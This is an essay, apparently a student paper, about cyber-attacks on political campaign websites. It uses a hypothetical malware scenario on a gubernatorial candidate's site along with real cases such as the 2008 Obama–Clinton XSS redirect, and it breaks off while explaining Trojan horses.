Once upon a time, a candidate had to excel at kissing babies and stump speeches. These were the major ways in which the candidate got his -- or much less frequently her -- image out to voters. All that the candidate's staff had to do as to ensure that reporters and photographers showed up at the right time to capture the choreographed images. The world of politicking today has been entirely transformed by the use of virtual communication, both websites and social media. Thus not only do campaign staffs have to be ever-vigilant for the unscripted moment on the trail in which the candidate is caught with the rabbit-in-the-headlights look. They also have to be constantly on the look-out for attacks on websites that will either distort the candidate's message or shut down the ability of the candidate to get that message out. This paper begins with a scenario of a malicious code attack on a candidate's website and the ways in which the candidate's technical staff fights back against the attack.
The scene of the crime is the website of a candidate for governor. She belongs to the party not in power in the state and would therefore be considered very much a long shot. No one from her party has won the statehouse in over 20 years. However, this candidate has a number of advantages. She served in the army in both Iraq and Afghanistan. While she could not serve in a combat position because of her gender, she effectively saw action as a transport driver and several times saved the lives of other soldiers by helping to evacuate them. She is also a former Olympic-class sprinter and successfully raised her seven younger siblings after their parents were killed in a car accident. Her biography, along with a keen kind, sensible ideas, and an ability to connect with people from all backgrounds have made her a political star.
However, just as her campaign is getting off the ground and gaining contributions from across the state -- and indeed across the nation -- information starts showing up on her website that distorts her record in ways that are potentially especially harmful. One entry states that she is adamantly opposed to all agricultural subsidies, a position that she has not taken and that is politically perilous in her agrarian state. Another page, one outlining her military service, ends with the false claim that she was given a general rather than an honorable discharge, a red flag to anyone who has served in the military.
Yet more information on the page suggests that those siblings of hers have served repeated jail terms, including several for sex-related crimes, something that (if true) would certainly drive away many of the family-oriented voters in her state.
And if all of this weren't bad enough, a number of the candidate's donors have made police reports that the credit cards that they used to make donations to the candidate through her website (a common use for political websites) seem to have been compromised because fraudulent charges have shown up on them. This would be a serious problem if the donors were larger ones, but in fact most of those who have been affected were those who contributed very small amounts, on average less than twenty dollars. These are the donors who can least afford a financial attack and those who are most likely to turn against the candidate as a result.
An Increasing Threat to the Democratic Process
While the above scenario is indeed hypothetical, it is also realistic. The 2008 presidential campaign, the first in which the internet proved to be a central mechanism, saw a number of cyber-attacks, including an attack that diverted traffic from the website of Barack Obama to that of Hilary Clinton while the two were still rivals for the Democratic nomination.
While the attack was discovered relatively quickly with little serious damage done, if it had gone undetected and the designers of the attack had been sufficiently malicious, there could have been significant consequences, including the funneling of money donated to Obama to another source.
Also, according to Opensecrets.org, a website that reports on monies raised and spent in political campaigns, $17 million has already been spent on web media in the 2008 primaries. By exploiting vulnerabilities in the candidates' websites, West said, there is not only the loss of access to a potential constituency, but also a potential financial loss.
The recent exploit on the Obama and Clinton sites were very crude, but it could be a hint of things to come, Bill Pennington, vice president of services at WhiteHat Security, told SCMagazineUS.com.
"They could rewrite the HTML code to have money go to Hillary when it was meant to go to Obama," he said.
Zulfikar Ramzan of Symantec Security Response agreed. Although he said this type of XSS assault is common and this particular exploit made news because of the site's high profile, Ramzan said it would be easy for a hacker to use the site in a more malicious way. (Poremba, 2008)
Political cyber-attacks are most certainly not limited to national campaigns. Even local campaigns have been subject to vicious attacks as well. One Boston-area attack blended personal and technical elements in a potentially very damaging way.
Shortly after Corey Abrams announced last month that he was running for a seat on the Revere City Council, a caller threatened to post pornography on a website he had created and called coreyabrams.com -- unless the candidate paid him for the domain name.
Abrams, a married father of four, refused and within days graphic pornographic images appeared on the website, according to his campaign manager.
Last week, anti-Semitic and racist postings appeared on the site, including a doctored photograph of Abrams wearing a Star of David, which Jews were forced to wear by the Nazis during the Holocaust.
The cyber attacks on Abrams have turned a barely publicized campaign for the Ward One seat into a criminal investigation and brought condemnation from local leaders.
The Response: Malware Police to the Rescue
The campaign staff quickly realize that they have been the victims of a cyber-attack. However, lacking the technical skills to fight against such an attack, the staff call in a company that focuses on fighting such malicious attacks. Their first job is to diagnose what has happened. They begin to look for malware, a very common form of cyber-attack, although not as well-known to the campaign staff as denial-of-service attacks.
Malware is a broad category of software and refers to any software that is constructed to allow secret access to a software system that occurs without the owner's consent (or, therefore, knowledge). The "mal" in the term refers to "malicious" and so malware is always a form of hostile or at least annoying program code. At its most powerful, malware has the potential to do significant harm, as we have seen in our hypothetical scenario above.
The first step taken by the outside technical consultants that the campaign staff have called in is to look for the way that the malware has entered the campaign's computer system. As is clear from the use of such terms as "virus" and "bug" as they are applied to computer systems, humans have constructed software and hardware systems so that in some ways they reflect biological systems. (This should hardly be surprising: Every new technology incorporates past knowledge, and so when people began to design the first computer systems, they modeled them on both mechanical and living systems.) Computers, like human bodies, can only be infected if there is a breach in their "immune" system.
A Breach in the Virtual Immune System
The campaign staff, all in their teens and twenties, are all of a generation to know the basics of computer security and so have installed firewalls and anti-viral programs into all of the computer systems that they use. However, they are not experts as are the cyber-crooks working for their candidate's rival and they have not been as careful as they should in preventing a security breach to their system.
When the staff first became aware that they were under cyber-attack, they ran various diagnostic tests on their systems, which had had their anti-viral programs updated on a daily basis since the campaign quarters were set up. They were unable to find the root of the problem, however, which is not surprising. The first job of any designer of malware is to create a way for it to run undetected in its targeted system. If the malware is easily detected, then the authorized administrator of the system could shut it down or delete it.
The most common way in which malware enters a system is through a Trojan horse, in which it is disguised as something that authorized users want. In this case, the malware was willingly, albeit unwittingly, installed by the campaign staff because it was presented to them as a software system that…